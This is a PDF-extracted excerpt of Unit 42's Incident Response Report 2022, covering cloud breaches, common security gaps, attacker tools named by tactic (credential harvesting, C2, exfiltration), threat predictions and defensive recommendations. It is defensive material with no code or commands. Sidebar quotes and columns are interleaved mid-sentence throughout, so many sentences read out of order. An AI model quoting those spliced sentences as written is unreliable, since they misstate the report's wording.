Spotlight: Cloud Incidents
LOW-HANGING FRUIT
FOR THREAT ACTORS

Cloud incident response cases deserve

a separate discussion because our incident “Right now, threat actors
response consultants say there are two key in the cloud don't have
distinctions in the cloud cases we handle: to try very hard to be
successful at what they
1. Different technology concepts mean that
do. They may look around
incident response cases in the cloud often
and say, 'Okay, there is
work differently than traditional incident
a door, here are the keys – nobody even
response cases.
knows we found them. Let's see if this
2. Right now, cloud threat actors have it easy due works. Oh, it does!' Then they take what
to the many unknown facets of the current they think is worth something, leave a
cloud threat landscape (though organizations ransom note, and kick over a few flower
have the power to change this). pots on the way out—just to add a dash
of destruction.”

How the Cloud Landscape Changes Ashlie Blanca, Unit 42 Consulting Director
Incident Response
Cloud environments are ever-changing. Instances
are spun up briefly to handle key workloads, and
the next day they no longer exist. Standard incident Case Study
response procedures, specific to data collection, An organization set up a cloud environment for
often aren’t as effective in cloud environments a short-term project. It was left exposed to the
because the cloud landscape is both dynamic and internet and misconfigured with a blank root
ephemeral, and cloud environments can be complex, password. A threat actor happened to find the asset
often using a variety of applications and tools that and came in, wiped the data, and left a ransom note.
may even be hosted across several different cloud
service providers (CSPs). This can create a challenge
in identifying the full scope.

INCIDENT RESPONSE REPORT 2022 24

SPOTLIGHT: CLOUD INCIDENTS—LOW-HANGING FRUIT FOR THREAT ACTORS

Incident response cases involving cloud breaches call for a different

understanding of how to gather evidence. Ephemeral workloads may mean it’s
not as simple as pulling a standard set of logs, and the amount of data required
for review often far exceeds what’s seen in a traditional case. Working in the
cloud also requires an understanding of the shared responsibility model.
Some aspects of security are the responsibility of the CSP's hosting data and
applications, but others are the responsibility of the customer.

Many customers appreciate the “plug and play” aspects of operating in the
cloud, and they operate trusting in the security controls afforded by major
CSPs, but that security breaks down when organizations don’t realize that
those security controls often need to be activated and properly configured.
Organizations are also responsible for identity and access management
(IAM)—setting and maintaining proper controls over who can do what in a
given cloud environment.

While understanding cloud technologies and configuring them properly is

a general issue in cloud security, it can have a specific impact on incident
response. For example, if an organization hasn’t properly configured data
and logs, it’s possible not to have access to that information in the event of
a breach. In some cases, our consultants report having to subpoena CSPs to
obtain key information for an investigation—a time-consuming process at a
moment when every second counts.

Why Cloud Threat Actors Have it Easy

Our security consultants say that misconfigurations are a primary root cause
of breaches in the cloud—and the problem appears to be growing worse.
Properly configured cloud environments ensure that data is preserved and
present, turn on security controls provided by CSPs, and manage identity and
access to avoid sharing powerful capabilities or sensitive information with
people who don’t need it.

Improperly configured cloud environments can essentially leave the door

unlocked for malicious actors, allowing them to gain initial access without
needing to find and exploit a vulnerability or make use of sophisticated
techniques. Unfortunately, improperly configured cloud environments
are extremely common. Recent Unit 42 research into IAM analyzed more
than 680,000 identities across 18,000 cloud accounts from 200 different
organizations and found that nearly all (99%) lacked the proper IAM policy
controls to remain secure. This matters because the same research found that
65% of known cloud security incidents were due to misconfigurations.

INCIDENT RESPONSE REPORT 2022 25

SPOTLIGHT: CLOUD INCIDENTS—LOW-HANGING FRUIT FOR THREAT ACTORS

To make matters worse, when Unit 42 researchers have followed

changes in misconfigurations over time, they’ve observed more
For an in-depth overview
misconfigurations, not fewer. We’ve also observed that known
of cloud security findings,
cloud incidents have grown at a faster rate than cloud workloads.
with a particular focus on the
This essentially means that threat actors targeting cloud
importance of identity and access
environments have plenty of low-hanging fruit to choose from. management and the TTPs of
As a result, our security consultants focused on cloud incident cloud threat actors, refer to the
response say they don’t typically see the same types of cases that Unit 42 Cloud Threat Report,
are common for the rest of the organization. Ransomware, for Volume 6, or watch Unit 42
example, is harder to deploy in cloud environments and often researchers discuss these issues
calls for more complexity than cloud threat actors need to meet in an on-demand video.

their goals.

Instead, many threat actors targeting cloud environments simply

steal credentials—often stored externally in GitHub or other
code-sharing instances and not sufficiently secured—and then
engage in data theft or destruction. Occasionally, threat actors
extort organizations by using their access to drive up resource
costs, coercing payment through the threat of an exorbitant bill
from a CSP. These tactics allow threat actors to make money by
selling sensitive information or extorting organizations without
needing to use sophisticated malware.

How to Make a Cloud Threat Actor’s Job Harder

Our consultants say that one of the best things organizations can
do to protect against breaches in cloud environments is to ensure
that those responsible for those environments are well-trained
in how to properly configure them and how to manage access
securely. Simply making it harder for threat actors to gain access
would prevent a great number of today’s cloud incidents. Our
clients often notice a breach due to alerts going off or an uptick
in resource usage. This means that ensuring that monitoring and
logging are properly set up can help identify issues quickly.

As long as the majority of organizations are leaving cloud threat

actors easy access points, attackers likely won’t mature their
techniques. After all, why work harder than necessary? However,
our consultants predict that as more organizations learn how to
properly safeguard cloud environments, threat actors will likely
begin to use more sophisticated techniques.

INCIDENT RESPONSE REPORT 2022 26

06
Seven Issues Threat Actors
Don’t Want You to Address
When breaches happen, one of the most common questions
after the fact is: What went wrong? Below are the most
common answers from the cases we handled.

Consider this list a reverse-engineered set of recommendations based on our

case observations from the past year. If you ensure your organization addresses the issues
below before an incident occurs, you can discourage threat actors who are after low-hanging
fruit. If threat actors do try to attack your systems, they’ll have a harder task ahead. In other
words, here are seven issues threat actors are hoping you won’t get around to addressing.

Multifactor authentication Mitigations for

1 4
In 50% of cases, organizations lacked brute-force attacks
multifactor authentication on key internet- In 13% of cases, organizations had no
facing systems such as corporate webmail, mitigations in place to ensure account
virtual private network (VPN) solutions and lockout for brute-force credential attacks.
other remote access solutions.

Security alerts
EDR/XDR 5
2 In 11% of cases, organizations failed to
In 44% of cases, organizations did not have review/action security alerts.
an endpoint detection and response (EDR)
or extended detection and response (XDR)
Password security
security solution or it was not fully deployed
6
on the initially impacted systems to detect and In 7% of cases, weak password security
respond to malicious activities. practices contributed to threat actors’
ability to further their objectives
(e.g., default password, blank or
Patch management
3 empty password, easily guessed or
In 28% of cases, having poor patch management brute-forced password).
procedures contributed to threat actor
success. This refers to any time a non-zero-day
Misconfigurations
vulnerability was exploited by a threat actor 7
in any way and includes situations in which an In 7% of cases, system misconfiguration
exploit helped a threat actor at some point after was a contributing factor to the incident.
initial access. It does not include cases when
threat actors exploited a zero-day vulnerability
to gain access.

INCIDENT RESPONSE REPORT 2022 27

SEVEN ISSUES THREAT ACTORS DON’T WANT YOU TO ADDRESS

Case Study “If your organization has

Unit 42 incident responders assisted a client with an EDR or XDR solution,
a matter where it was determined that the threat make sure to monitor
actor was persistently accessing the environment the alerts.
using the client’s VPN solution. The company’s IT I have been on multiple
personnel were bewildered as to how this could
engagements where threat actors were
happen since they required MFA for all accounts.
eventually able to disable EDR and
Unit 42 determined that a single IT administrator
antivirus to deploy ransomware. The
had been granted an exception and used a web-
clients sometimes see this as a failure of
based SSL VPN portal to support a legacy solution
their security product, when in fact, their
that did not require MFA, and this ended up being
the threat actor’s entry vector.
security tool has been telling them there
are major, obvious problems for weeks or
even months before the threat actor was
finally able to get to a point where they
could disable security tools.

In many of these matters, organizations did do This advice also applies to old school
some of these things in many instances. But even antivirus for organizations that don’t
one gap is all an attacker needs to get a foothold into have EDR or XDR. Many threat actor
a victim’s environment. tools will be blocked by antivirus. It is
important to stay on top of what your
Likewise with EDR/XDR deployment, even in security tools are blocking so you can take
environments with broad coverage, there can be appropriate action.”
“shadow IT” (unmanaged or unauthorized) systems
John Percival, Unit 42 Consultant
in the environment with inadequate security controls,
or unsupported legacy systems with deficient
protections. Often companies are unaware of these
systems, and they can end up being contributing
factors to a cybersecurity incident.
50%
Therefore, one important step organizations can of organizations involved in breaches
take to improve defenses is to conduct a thorough lacked multifactor authentication on
inventory of what’s on the network and watch out key internet-facing systems.

for anomalies, which can be done through an attack

surface management solution. If you know the attack
surface, you have a better chance of getting ahead of a
threat actor.

INCIDENT RESPONSE REPORT 2022 28

07
What Threat This section describes the capabilities we most commonly
observed threat actors using in our incident response cases

Actors Do Once after initial compromise of a network. If you work closely with
the specifics of your organization’s systems, this list can help

They’re Inside you see what you most need to watch for. If you safeguard your

a Network
organization from a higher-level perspective, you can share
this list with your security team or use it to help you gain an
understanding of how threat actors typically behave once
they’re inside.
Once attackers gain access to
a network, they have certain Discovery
typical goals. For example,
This is a step attackers take to figure out what they can do
they might begin using tactics with the access they’ve gained. They’re essentially exploring
associated with discovery— a system and internal network to see what they can control,
gaining knowledge about what they can steal, what else they can attack, etc.

the system and internal

Capabilities most commonly used for discovery
network—in order to decide • Advanced IP Scanner
what to do next. • Advanced Port Scanner
• AdFind
• Nmap

Command and Control or Beacon

Command and control (C2) covers the techniques that
attackers use to communicate between a network they’ve
compromised and a network they control. For example,
malware often “phones home” to a C2 server to check for other
malware to download or to send exfiltrated data to the threat
actor. Attackers typically take steps to make C2 traffic appear
“normal” in some way to make it harder for organizations to
notice that a breach has occurred.

Capabilities most commonly used for C2/Beacon

• Cobalt Strike
• Metasploit

INCIDENT RESPONSE REPORT 2022 29

WHAT THREAT ACTORS DO ONCE THEY’RE INSIDE A NETWORK

Lateral Movement
An attacker gains initial access to a specific part of a network. Similar
to opening doors to get from a foyer into other parts of a house, lateral
movement is the process attackers use to move into and control other
systems on a network. Doing this expands the impact an attacker can
have in a compromised environment.

Capabilities most commonly used for lateral movement

• AnyDesk • LogMeIn
• ConnectWise/ScreenConnect • TightVNC
• TeamViewer • PuTTY
• Splashtop
• Microsoft Remote Desktop

Key Insight
Our incident responders sometimes find that threat actors have been
active in an environment for much longer than initially thought by
the client. In some cases, threat actors have been found to have been
active and moving laterally through an environment for a period of six
months or more.

Credential Harvesting
Credential harvesting is another way for attackers to gain access to
more resources or more sensitive information. It refers to methods
of stealing names and passwords. Like many other techniques here,
this expands access for the threat actor, which in turn expands the
potential impact of the breach.

Capabilities most commonly used for credential harvesting

• Mimikatz
• LaZagne
• Impacket secretsdump
• Procdump targeting lsass process
• Multifunctional post-exploitation tools (e.g., Cobalt Strike)

INCIDENT RESPONSE REPORT 2022 30

WHAT THREAT ACTORS DO ONCE THEY’RE INSIDE A NETWORK

Exfiltration
Exfiltration means stealing data. This is often where attackers
make their money. Once they steal data, they can sell it to interested
parties or extort the target by threatening to release it publicly.

Capabilities most commonly used for exfiltration

• Applications
− Rclone
− MEGASync
− FileZilla “The quantity of stolen
− WinSCP data does not directly
• Compression correlate to the
− 7-Zip negative impact of
− WinRAR its theft. Unauthorized acquisition of
• Web/cloud storage services a single spreadsheet containing a list
− MEGA of individuals’ personally identifiable
− Dropbox information (PII) could result in a
− Google Drive large data breach, even though the
− OneDrive
file size itself may be very small.
− DropMeFiles
Companies should avoid storing such
repositories of sensitive information
− Sendspace
in unencrypted files and should be
− Web Email Services
cognizant of where this information is
− Threat Actor Controlled
System located in their environment.”

Dan O’Day, Unit 42 Consulting Director

Classifying Attacker Behavior

One common language for understanding adversary tactics and techniques, used by
many organizations globally, is the MITRE ATT&CK framework, which seeks to classify
real-world observations of threat actors. This framework provides a way to understand
the underlying purpose of the actions attackers take, and it provides a clear way to
communicate about these actions across organizations. When Unit 42 publishes about
adversary behavior, we typically align what we’ve seen with this framework, and it can
be a useful reference if you’re seeking more information about any of the categories of
attacker behavior listed here.

INCIDENT RESPONSE REPORT 2022 31

08
Predictions: Follow the Money
So far, we’ve shared key insights into current trends around
breaches. We know attackers are often financially motivated and
they’re looking for the easy way in—and we’ve shared the specifics
of how that appears in the current threat landscape.

But we also asked our security Prediction #1: Time to Patch

consultants to take a guess at where High-Profile Vulnerabilities Will
threat actors are going in the near future. Continue to Shrink
After all, so much of cybersecurity involves the Attackers are making increasing use of high-profile
constant attempt to stay ahead of ever-evolving zero days—the kind you read about in the news. For
threats – where might defenders get a leg up? evidence, see our earlier statistics on attackers’ use of
Apache Log4j vulnerabilities, for example, and highly
As always, the general advice is to continue to
publicized vulnerabilities in Zoho ManageEngine
follow the money. Since much of what threat
ADSelfService Plus. Anytime a new vulnerability is
actors do is financially motivated, a good rule of
publicized, our threat intelligence team observes
thumb for defenders is to secure any pathway that
widespread scanning for vulnerable systems. Our
could allow attackers to make a buck.
security consultants say they’re also seeing threat
However, our on-the-ground view can give us actors—ranging from the sophisticated to the script
more specific insights. Here are our incident kiddies—moving quickly to take advantage of publicly
responders’ top predictions for the coming year. available PoCs to attempt exploits.

While some threat actors continue to rely on older,

unpatched vulnerabilities, we’re increasingly seeing
that the time from vulnerability to exploit is getting
shorter. In fact, it can practically coincide with the
reveal if the vulnerabilities themselves and the access
“One thing is certain:
that can be achieved by exploiting them are significant
Wherever threat
enough. For example, Palo Alto Networks released
actors can make
a Threat Prevention signature for the F5 BIG-IP
money is where
Authentication Bypass Vulnerability (CVE-2022-1388),
they’re going to spend their time.”
and within just 10 hours, the signature triggered
Chris Brewer, Unit 42 Consulting Director 2,552 times due to vulnerability scanning and active
exploitation attempts.

INCIDENT RESPONSE REPORT 2022 32

PREDICTIONS: FOLLOW THE MONEY

The 2022 Attack Surface Management

Threat Report found that attackers typically
start scanning for vulnerabilities within
15 minutes of a CVE being announced.
“Asset inventory
Additionally, end-of-life (EoL) systems
is a critical part
remain unpatchable and available to an
of cybersecurity.
opportunistic attacker for exploitation. For
You likely won’t
example, the same report found that nearly
secure what you aren’t aware
32% of exposed organizations are running
of, and you have zero visibility
the EoL version of Apache Web Server, which
into assets you don’t manage or
is open for remote code execution from the
know about.”
vulnerabilities CVE-2021-41773 and CVE-
2021-42013. We expect this trend to continue Dan O’Day, Unit 42 Consulting Director

and be augmented by the ongoing increase in

internet-exposed attack surface.

What You Can Do to Get Ahead

Organizations may have previously grown used to taking time

between the disclosure of a vulnerability and patching it, but while
it’s still necessary to perform due diligence on a patch, attackers’
ability to scan the internet in search of vulnerable systems means
it’s more important than ever to shorten the time it takes to
patch. Organizations need to ramp up patch management and
orchestration to try to close these known holes as soon as possible.
An attack surface management solution can help organizations
identify vulnerable internet-exposed systems and can often catch
systems that organizations may not be aware are running on
the network.

Prediction #2: Unskilled Threat Actors

Are on the Rise
Our incident responders anticipate a rise in, to put it bluntly, threat
actors who don’t seem to know what they’re doing. Even threat actors
who seem to have attack basics down are beginning to resort to the
simpler versions of attacks—for example, using extortion without
encryption rather than executing a full-blown ransomware attack.
Cloud incidents could also rise since threat actors in the current
environment often need to discover carelessly guarded credentials
rather than demonstrate advanced technical skill.

INCIDENT RESPONSE REPORT 2022 33

PREDICTIONS: FOLLOW THE MONEY

Several factors could contribute to the

phenomenon. High-profile reports of lucrative
hacks combined with global economic pressures
could push more people to try their hand at Case Study
becoming cybercriminals—whether or not Unit 42 security consultants were
they have the technical skills. RaaS and similar attempting to negotiate for a

affiliate programs could cause a flood of ransomware case, but the threat

wannabes. It’s also possible that nation-state actors they needed to deal with had
a broken chat portal and busted
recruitment of skilled threat actors could leave
infrastructure. This left no way
spots open for novices wishing to operate more
to communicate with the threat
pedestrian scams. Even unskilled attackers,
actors—or even to pay the ransom
however, could do damage to your organization if
demand should the client have
they’re able to breach your systems.
chosen to do so.

What You Can Do to Get Ahead

The good news about unskilled attackers is that

they’re more likely to be stopped when organizations follow best
practices and consistently introduce basic roadblocks. You can see
this as an opportunity to reinvest in the fundamentals and ensure
that you’re using a defense-in-depth strategy.

Educate members of your organization about best practices to

avoid social engineering schemes—an approach often favored
by less technically skilled threat actors. Solidly covering the
foundations of good cyber defense can ensure that rookie
cybercriminals looking for a quick payout have a very frustrating
day when they encounter your network.

Prediction #3: Changes to Cryptocurrency Could

Cause a Rise in Business Email and Website
Compromises
One thing that currently contributes to the lucrative nature
of ransomware is the prevalence and relative anonymity of
cryptocurrency, which gives attackers a way to collect ransoms that
avoids banks or institutions that might be able to reveal their true
identities. Recently however, law enforcement agencies have had
greater success tracing crypto wallets back to their true owners and
recovering ransoms. The DOJ, for example, successfully recovered $2.3
million in bitcoin tied to the Colonial Pipeline ransomware attack.

INCIDENT RESPONSE REPORT 2022 34

PREDICTIONS: FOLLOW THE MONEY

Further, changes in the availability or stability of cryptocurrency

undermines its utility as a means of payment. These trends may
incentivize threat actors to pivot back to classic fiat currency-based
schemes. This could cause a rise in, for example, traditional credit Case Study
card fraud (often associated with website compromise), and of Unit 42 has helped organizations
course, BEC (already popular with threat actors). respond to multiple Lapsus$ attacks—a
group notable for its low emphasis on
attacks that require technical skill. The
What You Can Do to Get Ahead Lapsus$ group doesn’t employ malware
in breached environments, doesn’t
It’s important to prepare against the possibility of encrypt data and in most cases, doesn’t
ransomware—after all, that’s the top incident type that our actually employ extortion.
consultants see. However, don’t focus on ransomware to
Instead, the group focuses on using a
the exclusion of all else. Your organization should institute
combination of stolen credentials and
protections against any popular scheme that could earn threat
social engineering to gain access to
actors money. In that way, you can be ready if attackers shift to
organizations. We’ve also seen them
a different favorite attack type.
solicit employees on Telegram for their
login credentials at specific companies
in industries including telecom,
Prediction #4: Difficult Economic Times Could software, gaming, hosting providers,
Lead More People to Leverage Cybercrime and call centers.

If global economic conditions worsen, more people may be Despite the low-tech approach, the
incentivized to try their hand at cybercrime. While this could group’s attacks and leaking of stolen
mean people with some technical skills looking to make a data can be damaging. We’ve also
quick buck during a hard time, it could also mean that people seen destructive Lapsus$ attacks
within organizations are more likely to explore potential deals where the actors gained access to an

with threat actors. organization’s cloud environment,

wiped systems, and destroyed
Some threat actor groups have been known to offer to pay insiders virtual machines.
who are willing to hand over credentials or assist with other forms
Arrests associated with Lapsus$,
of sabotage. When some people are struggling to make ends meet,
including that of the apparent
those offers could be more tempting to some.
ringleader, involved a number of

These factors may combine with the prevalence of remote individuals between 16 and 21. Unit 42

and hybrid work—which can make it easier for insiders to researchers assisted law enforcement
with information on Lapsus$ threat
steal intellectual property. When working remotely for most
actors’ activities.
organizations, simply disconnecting from the VPN is sufficient for
preventing the organization from having insight into your traffic.
A company might block personal email and cloud storage sites, but
the employee can simply disconnect from the VPN and use their
home internet to access these resources from their work computer,
then copy company data to these personal locations.

INCIDENT RESPONSE REPORT 2022 35

PREDICTIONS: FOLLOW THE MONEY

What You Can Do to Get Ahead

Follow best practices for remote workers, including deploying

robust endpoint detection. Make sure you are practicing the
principle of least privilege, limiting access to sensitive data to
those who need to have it. Consider a data loss prevention (DLP)
solution to monitor, govern, and prevent unsafe transfers of
sensitive data and corporate policy violations.

To protect against insider threats from employees who leave

your organization, revoke access to accounts promptly upon
an employee’s departure. Integrating these processes with
HR termination processes can help ensure these steps are not
overlooked. Analyze data sent to personal email accounts, cloud
storage accounts, removable storage devices and so on during the
last 30 days prior to an employee submitting their resignation and
continue monitoring/restricting until their employment ends.

Prediction #5: Politically Motivated Incidents

May Rise
As hot-button political issues intensify around the globe, our incident
response consultants believe there may be an increase in hacktivism
and politically motivated cybercrime. This could include, for example,
data exfiltration, likely with the purpose of sharing it publicly, website
defacement, or other ways to make a statement.

In some cases, threat actors may be working with nation-states or

on the payroll of politically motivated groups, and in other cases, the
threat actors may themselves have political motivations.

What You Can Do to Get Ahead

In addition to following best practices to protect your network—

as you would for any cyberthreat—keep a particular eye on
alerts from organizations such as the U.S. Cybersecurity and
Infrastructure Security Agency (CISA). Organizations like this one
often provide warnings about prominent attack vectors or groups
of concern.

INCIDENT RESPONSE REPORT 2022 36

09
If You Take Any Action to
Protect Your Organization,
Start With These Six Things
The cyberthreat landscape can be overwhelming. Every day brings news of more
cyberattacks and ever-more-sophisticated attack types. Some organizations may
not know where to start, but our security consultants have some suggestions.

Unit 42 security consultants take pride in Multifactor Authentication (MFA)

acting as trusted advisors. We are always looking improves on the traditional password
authentication method by requiring
for opportunities to give back to the cybersecurity
two or more pieces of evidence for
community, and we often share key pieces of advice with
authentication—helping prevent
existing and future clients.
threat actors from being able to access

Our security consultants have compiled the list below a system with stolen passwords alone.

of the most common recommendations given to clients, Additional authentication methods

include confirmation messages sent to a
based on real-time threat intelligence and experience
smartphone, for example, or the use of an
with hundreds of incident response matters. It is
app for additional verification.
important to note that the provided recommendations
are in no way a “silver bullet” for security. However,
they are a starting point toward achieving a more
robust and resilient cybersecurity program. If you aren’t
addressing these recommendations, we advise that
you try to incorporate them into your organization’s
strategic roadmap.

If you’re further along in the journey toward securing

your organization, it’s still a good idea to double check
to be sure you have these fundamentals in place. For “Use multifactor
example, in our work with BEC, we found that many authentication
organizations believe they’ve already taken the necessary everywhere
steps to protect themselves. However, in 2021, Unit 42 possible.”,
found that 89% of organizations that had been subject to
Preeti D’Costa,
BEC attacks had not turned on multifactor authentication Unit 42 Principal Consultant
(MFA) or followed email security best practices.

INCIDENT RESPONSE REPORT 2022 37

 If You Take Any Action to
Protect Your Organization,
Start With These Six Things

The broad domains

and extensive reach of
1 Conduct phishing prevention and recurring
employee and contractor security training.

cybersecurity make it easy for

potential gaps or deficiencies 2 Disable any direct external RDP access:
ensure all external remote administration
to fall off the radar. All it is conducted through an enterprise-grade
takes is one unrecognized MFA VPN.

gap for an attacker to gain a

foothold in an organization’s 3 Patch internet-exposed systems as quickly
as possible (given best practices for testing
cybersecurity infrastructure. and responsible deployment) to prevent
vulnerability exploitation.

4 Implement MFA as a technical control

and security policy for all users.

5 Require that all payment verification

takes place outside of email to ensure a
multi-step verification process.

6 Consider a credential breach detection

service and/or attack surface management
solution to help track vulnerable systems
and potential breaches.

“Work on the basics.

Organizations like to follow
the news and go after the
new ‘named’ vulnerability
while still lacking in the
fundamentals such as patch management
and multifactor authentication.”

Clint Patterson, Unit 42 Principal Consultant

INCIDENT RESPONSE REPORT 2022 38

10
Conclusion: Securing Your
Organization Is a Journey,
Not a Destination
We’ve aggregated the information gathered during our incident
response cases to provide an in-depth view of today’s cyberthreat
landscape, as well as what tactics threat actors may use in the future.

Now, it’s up to you to determine where

to focus your defense efforts. We don’t Initiate Your Response Within Minutes
believe it’s possible to ensure that no breach
The clock starts immediately when you’ve identified a
will ever happen, but we do know it’s possible
breach. If you don’t contain the breach right away and
to be well-prepared.
determine the root cause, your adversary will be back in your

By taking action now, you can ensure that environment again.

your organization isn’t an easy target

With a Unit 42 Retainer, our experts become an extension
for threat actors. You can also minimize of your team on speed dial, helping you respond faster so
damage in the event of a cyberattack by you can minimize the impact of an attack and get back
limiting attackers’ ability to spread through to business sooner.
your networks and work out ahead of time
what your organization will need to do to
remove threats, restore normal operations
and recover.

Once you’ve covered the basics outlined

previously, you can turn to the more in-depth
recommendations that follow. First, we share
a more detailed list of recommendations that
can help secure your organization as a whole.
“Remember to protect yourself
Next, we share recommendations geared
against the hackers—not just
toward preventing common initial access
the auditors.”
methods and attack types, which can help
you concentrate on mitigating the risks that Dan O’Day, Unit 42 Consulting Director
matter most to your organization.

INCIDENT RESPONSE REPORT 2022 39

Appendix: In-Depth
Recommendations to Help
Secure Your Organization

Once you’ve addressed our six essential

recommendations, you can turn to the sections below Password Tips to Help
for more comprehensive recommendations and guidance. Prevent Compromise
The recommendations are divided into sections to help
One of the easiest ways for threat actors to perform
you focus your efforts where your organization most
unauthorized actions is if they can gain access to
needs protection.
authorized credentials. Because of this, strong
passwords are of paramount importance. While
Recommendations to Help Make Your passwords should be augmented with MFA wherever
Organization as a Whole More Secure possible, we recommend the following best practices
to strengthen password security:
• Regularly create and test backups; ensure the
backups are stored in a secure off-network location • Require that default passwords be changed.
and are appropriately protected via physical or
• Passwords should be at least 15 characters
technical controls so threat actors cannot gain access in length.
and disable or delete backups to prevent recovery.
• Passwords should include both uppercase and
• Adopt account administration best practices across lowercase letters.

the organization, including requiring unique and • Passwords should include numbers.
complex passwords that are at least 15 characters in
• Passwords should include special characters.
length so they cannot be easily brute forced.
• Individuals should be educated about the dangers
• Implement a password management solution to of reusing passwords in multiple contexts.
enable employees to manage complex passwords
• Provide a password management solution to
more effectively.
enable employees to manage complex passwords
more effectively.
• Prevent the use of default accounts and passwords.

INCIDENT RESPONSE REPORT 2022 40

APPENDIX

• Integrate MFA for all remote access, internet-

accessible, and business email accounts to greatly
“My proudest moments
reduce the organization’s attack surface. To prevent
come when the client
threat actors from circumventing MFA, disable
is able to restore their
legacy authentications/protocols and confirm that
systems so they can
MFA is not only deployed, but that employees are
resume business operations.”
also using it correctly.
Danielle Lopez, Unit 42 Senior Consultant
• Remember to implement MFA internally. Too
often, after authenticating MFA once, a user can
bounce around the network without needing to • Maintain a log retention repository and regularly
re-verify MFA, even when moving to a system review all logs and login attempts for any unusual
with a different trust level (e.g., from workstation behavioral patterns. Ensure that logs are stored
to server). for the appropriate amount of time to fulfill any
legal or regulatory obligations. Our consultants
• Consider using single-sign-on (SSO) platforms for recommend a bare minimum of 90 days, though
web applications. some we surveyed recommend a year or more—as
long as possible.
• Leverage EDR or XDR solutions, and ensure your
security operations team understands how to • Leverage log aggregation systems, such as a
utilize this technology in order to maintain full security information and event management
visibility across the network. (SIEM) system, to increase log retention,
integrity, and availability.
• Patch management is critical for operating
systems and on-premises applications; APT • Conduct regular security awareness training
actors will move very quickly to capitalize on for all users, including contractors, on a yearly
vulnerabilities. While it’s still necessary to test basis. Also consider utilizing a trusted training
patches in non-production environments and platform that allows you to incorporate custom
follow best practices for responsible deployment, goals and objectives into the training curriculum.
organizations must prioritize speed as well.
Address new published vulnerabilities as quickly as • Avoid utilizing a flat network: segregate
due diligence allows. networks and Active Directories, segmenting
sensitive data, and leverage secure virtual local
• Identify your organization’s critical and most area networks (VLANs).
valuable assets. This should include conducting
an inventory of critical assets to understand where • Understand where sensitive data lives and
your highest-value targets are and if they require implement strong access controls to protect that
any additional protection. data; monitor and audit access regularly. Limit
sensitive data access to only those who need it
• Regularly review Active Directory for newly within your organization and with third parties.
created accounts, mailboxes, and unrecognized
group policy objects.

INCIDENT RESPONSE REPORT 2022 41

APPENDIX

• Have an incident response and remediation • Upgrade from Server Message Block Version
plan: Incidents may occur despite best efforts, so 1 to limit adversaries from using the inherent
have a tested, comprehensive plan to ensure fast file sharing protocol to move laterally within
action should an incident occur. If you have cyber your systems.
insurance (recommended), be sure to integrate the
• Implement change control protocols that require
policy’s key processes and contacts into the plan.
review and sign-off on configuration changes.
• Follow a defense-in-depth approach,
• Disable administrative interfaces and access to
implementing safeguards at each layer of the
debugging tools for anyone whose job role does
web application stack. While the list can be long,
not require them.
it can include, for example, web application
firewalls, operating system hardening, • Configure servers to prevent unauthorized
application input controls (e.g., parameterization, access and directory listings. Enforce strong
validation), file integrity monitoring, least- access controls.
privileged user accounts for database access and
industry-standard encryption. • Configure security settings in your development
environment according to best practices.
• When implementing open source code, research
it to understand whether it has any published • Implement full-disk encryption for laptops and

vulnerabilities; only use code that is vetted removable devices. Also have a contingency plan

and patched. Code scanners may help identify to disable lost or stolen devices.

vulnerabilities in open-source software. A

• Implement and utilize mobile device
recent industry movement to embrace the
management applications that have the
use of software bills of materials—lists of all
capability to locate and/or remotely wipe devices.
the components, libraries and modules that
go into building a piece of software—could • Give your employees a way to conduct their
also make it easier to determine whether business legitimately; simply blocking certain
vulnerabilities lie within a piece of software your vectors will result in creative workarounds that
organization is using. you’ll likely miss.

• Conduct regular web application/code reviews • Establish a DLP program responsible for
and annual penetration testing for all public- classifying and tagging data and providing alerts
facing infrastructure to search for vulnerabilities; when sensitive or other company-identified
follow remediation recommendations. relevant information is leaving the organization.

• Run periodic scans that include configuration • Should an employee be terminated, act quickly
checks and perform regular system audits to to revoke their access (e.g., active sessions,
detect misconfigurations. Open source scanning tokens, accounts, MFA devices and rotating
tools are available to help. For example, there are credentials), and then verify that access has been
open source tools to identify leaked information revoked. Ensure you preserve their system and
from misconfigured IAM or find vulnerabilities data in case an investigation is needed. Coupling
during build-time in infrastructure as code. account revocation processes with HR processes
can help ensure these steps are not overlooked
during the termination process.

INCIDENT RESPONSE REPORT 2022 42

APPENDIX

• Consider purchasing domains based on • Gamify security training to better engage

common spelling errors or variations of your employees by setting goals, rules for reaching
organization’s name. This can make it harder for the goals, rewards or incentives, feedback
mechanisms and leaderboards (organizations can
threat actors to impersonate your organization.
compete against each other).
• Limit the use of privileged accounts to only
• Hold across-the-board training annually and a
when there is a valid business valid need or a mid-year “refresh” that builds on specific areas
user requires a privileged account in order to of emphasis, such as advanced techniques for
complete their job task, and do not reuse local all employees.
administrator account passwords. This will
• Adopt advanced phishing protection/machine
assist in preventing initial access by attackers, learning solutions or other third-party
privilege escalation and lateral movement across solutions to detect and deter sophisticated
the network. phishing campaigns.

• Use anti-spoofing and email authentication

Recommendations to Prevent techniques, such as Sender Policy Framework (SPF).
Phishing Attacks
• Consider blocking account logins based on
• Utilize trusted training vendors or platforms
geographic regions if not needed for normal
that allow for custom curricula tailored to the
business operations.
organization and employee roles and that takes
into account the fast-evolving nature of threat • Make it easy for users to report suspected
actor methodologies. phishing email; promptly review and take action
on such messages.
• Create a “security awareness culture.” It is
essential that company leaders buy into the • Visually alert users concerning attachments
importance of cybersecurity, support and from external senders. This may help identify
promote richer cyber training programs, and spoofed domains that appear similar to the
emphasize security in company communications. company’s domain.

• Tailor web-based modules customized to • Leverage email security solutions that scan
individual groups pertinent to their roles attachments and message contents as well as
and how they may be specifically targeted so assess sender reputation.
employees can better spot and avoid tactics that
may be used against them.

• Track leading performance indicators for

your phishing tests so you can adjust phishing
“Organizations should
content and difficulty based on the needs of assume that phishing will
the organization. get through at least some
of the time and users
• Develop comprehensive training that includes—
will engage. Plan around
and goes beyond—phishing and spear phishing.
Include other social engineering concerns that minimizing the impact.”
involve physical security, industry best practices Clint Patterson, Unit 42 Principal Consultant
against device loss, insider threat indicators, etc.

INCIDENT RESPONSE REPORT 2022 43

APPENDIX

• Many users have an unnecessary volume Recommendations to Secure Your

of unencrypted sensitive information in Cloud Environment
their email accounts. Simply not having this
• Periodically evaluate what data is accessible or
information in the account would significantly
exposed on the public-facing internet.
limit the scope of a potential breach should an
unauthorized party obtain access. Encourage • Leverage expertise in cloud security, per
users to store information of this type via a file platform. Managing security in the cloud
share with role-based access controls rather than requires expertise catered to the nuances of each
simply in email. platform. The more complex the platform, the
more plentiful the opportunities for errors that
Patching Recommendations to can inadvertently disclose data.
Keep Your Organization’s Systems • Ensure users with cloud control access are fully
Up to Date trained in each cloud environment.
